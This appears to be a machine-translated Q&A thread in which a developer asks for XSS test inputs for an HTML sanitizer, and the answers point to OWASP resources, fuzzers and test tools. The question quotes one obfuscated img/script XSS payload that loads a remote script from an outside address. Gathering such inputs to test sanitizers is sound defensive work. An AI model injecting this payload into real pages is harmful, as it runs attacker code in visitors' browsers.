XSS Torture Test - существует ли он?

Question

Я хочу написать html sanitiser и, очевидно, чтобы проверить / доказать, что он работает должным образом, мне нужен набор примеров XSS, чтобы проверить, как он работает. Вот хороший пример из Coding Horror

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

Я знаю, что есть тест на пытки мимом , который состоит из нескольких вложенных электронные письма с вложениями, которые используются для тестирования Mime-декодеров (если они могут правильно его декодировать, значит, они доказали свою работоспособность). Я в основном ищу эквивалент для XSS, то есть список примеров хитрого html, который я могу бросить в мой дезинфектор, просто чтобы убедиться, что он работает нормально.

Если у кого-то также есть хорошие ресурсы о том, как написать дезинфицирующее средство (т. е. какие обычные подвиги пытаются использовать люди и т. д.), они также будут с благодарностью приняты.

Заранее спасибо: -)

Изменить: Извините, если раньше это было неясно, но я был после серии тестов на пытки, поэтому я мог написать модульные тесты для дезинфицирующего средства, а не тестировать их в браузере и т. д. Теоретически исходные данные могли прийти откуда угодно - не просто браузер.

Answer 1

Взгляните на этот чит-лист XSS: https://www.owasp.org/ index.php / XSS_Filter_Evasion_Cheat_Sheet

Answer 2

XSS Me - отличный плагин для Firefox, с которым можно работать ваше дезинфицирующее средство.

Answer 3

Ознакомьтесь с OWASP . У них есть хорошее руководство о том, как работает XSS, что искать, и даже WebGoat проект, где вы можете попробовать свои силы на уязвимом сайте.

Answer 4

Вы можете попробовать jsfunfuzz Джесси Рудермана ( http: //www.squarefree .com / 2007/08/02 / introduction-jsfunfuzz / ), который выбрасывает случайные данные в ваш Javascript, пытаясь их сломать. Кажется, команда Firefox использовала это с большим успехом.